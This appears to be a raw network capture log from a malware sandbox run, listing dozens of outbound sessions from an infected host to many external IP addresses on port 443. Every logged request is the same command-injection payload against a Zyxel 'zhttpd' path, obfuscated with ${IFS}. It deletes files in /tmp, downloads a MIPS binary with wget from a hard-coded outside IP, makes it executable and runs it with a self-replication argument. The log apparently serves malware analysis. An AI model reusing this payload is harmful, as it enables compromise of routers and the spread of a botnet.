                                          Jan 14, 2024 15:46:20.076581001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5146192.168.2.233820620.90.122.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076657057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5147192.168.2.2354698120.79.85.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076700926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5148192.168.2.2357794167.54.66.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076738119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5149192.168.2.2339148104.188.95.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076767921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5150192.168.2.2356568207.25.218.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076807022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5151192.168.2.2347928178.97.36.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076848030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5152192.168.2.234709259.131.130.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076904058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5153192.168.2.2334228133.145.9.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076952934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5154192.168.2.2358520146.6.206.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.076997995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5155192.168.2.2352088207.203.137.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077028036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5156192.168.2.235204872.194.54.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077056885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5157192.168.2.2349824195.56.221.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077115059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5158192.168.2.2357650125.216.118.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077143908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5159192.168.2.2348996219.134.189.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077184916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5160192.168.2.23361588.140.22.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077212095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5161192.168.2.2334066198.201.5.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077239037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5162192.168.2.2336262186.19.216.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077259064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5163192.168.2.2356374198.237.252.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077320099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5164192.168.2.235811447.162.218.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077348948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5165192.168.2.2358918138.222.157.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077382088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5166192.168.2.2354896142.70.36.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077421904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5167192.168.2.2350888193.177.177.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077460051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5168192.168.2.235799850.240.150.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077486038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5169192.168.2.235068488.105.119.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077523947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5170192.168.2.234024439.156.155.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077567101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5171192.168.2.2359884207.127.162.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077593088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5172192.168.2.2354582104.66.95.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077635050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5173192.168.2.2336100204.77.135.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077671051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5174192.168.2.233360096.140.27.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077734947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5175192.168.2.235941482.119.26.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077758074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5176192.168.2.2354180172.107.189.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077790022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5177192.168.2.2339212105.83.60.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077821970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5178192.168.2.2339642209.172.25.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077877045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5179192.168.2.235067076.190.90.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077908993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5180192.168.2.2342052146.127.172.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077941895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5181192.168.2.2337232116.93.171.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.077976942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5182192.168.2.235979864.78.37.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078020096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5183192.168.2.2347280105.119.29.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078054905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5184192.168.2.235360051.150.92.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078073978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5185192.168.2.2336056176.7.176.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078140020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5186192.168.2.2345242202.157.193.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078176022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5187192.168.2.234061270.237.110.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078228951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5188192.168.2.2351166137.173.12.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078257084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5189192.168.2.234777025.69.191.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078293085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5190192.168.2.235594442.161.226.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078320026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5191192.168.2.233302086.179.150.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078347921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5192192.168.2.23413661.247.141.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078401089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5193192.168.2.2352424131.144.57.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078440905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5194192.168.2.2346838186.117.123.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078470945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5195192.168.2.2350944216.255.109.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078497887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5196192.168.2.235201474.32.194.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078536034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5197192.168.2.235540294.55.206.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078583002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5198192.168.2.2345932150.240.48.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078603029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5199192.168.2.2333022221.9.6.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078624964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5200192.168.2.234982023.41.82.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078697920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5201192.168.2.235096251.28.53.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078735113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5202192.168.2.2342232132.229.94.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078763008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5203192.168.2.23469889.46.185.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078809023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5204192.168.2.2343742209.159.74.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078843117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5205192.168.2.2343192134.70.22.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078870058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5206192.168.2.2357374135.106.209.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078934908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5207192.168.2.234317652.6.208.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.078963995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5208192.168.2.235431898.86.136.231443
                                          TimestampBytes transferredDirectionData
